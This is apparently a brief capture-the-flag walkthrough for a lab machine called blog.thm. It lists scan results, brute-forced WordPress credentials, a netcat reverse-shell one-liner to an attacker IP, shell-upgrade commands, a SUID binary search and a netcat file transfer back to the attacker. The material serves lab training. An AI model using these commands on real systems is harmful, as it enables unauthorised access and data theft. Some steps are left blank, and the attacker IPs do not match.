Target Information
- IP Address: 10.10.174.172
- Domain: blog.thm
- Operating System: Ubuntu 18.04.4 LTS (Bionic Beaver)
- Kernel: Linux 4.15.0-101-generic
NMAP Scan Results
PORT | STATE | SERVICE | VERSION |
---|
22/tcp | open | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
80/tcp | open | http | Apache httpd 2.4.29 ((Ubuntu)) |
139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
445/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
Ports Priority
PORT 80
- CMS: WordPress 5.0 (Confirmed)
- Credentials:
- [SUCCESS]: kwheel / cutiepie1 (Found By Rockyou.txt)
RCE (Remote Code Execution)
Reverse Shell (URL Encoded)
1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.69.221 4444 >/tmp/f
PORTS 139,445 (Rabbit Hole)
FULLY TTY
1python -c 'import pty; pty.spawn("/bin/bash")'
2stty raw -echo;fg;reset
3export TERM=linux
Privilege Escalation
Identify SUID Binary
1find / -perm /4000 -type f 2>/dev/null
Identified Binary: /usr/sbin/checker
Transfer Checker Binary
On Attacker Machine:
1nc -lvvp 7777 > checker
On Target Machine:
1nc 192.168.56.123 7777 < checker
Decompile Checker Binary
- Analyze the binary using Ghidra.
Set Custom Variable
Execute Checker Binary
Note: Understand the binary's behavior before execution.
Pwned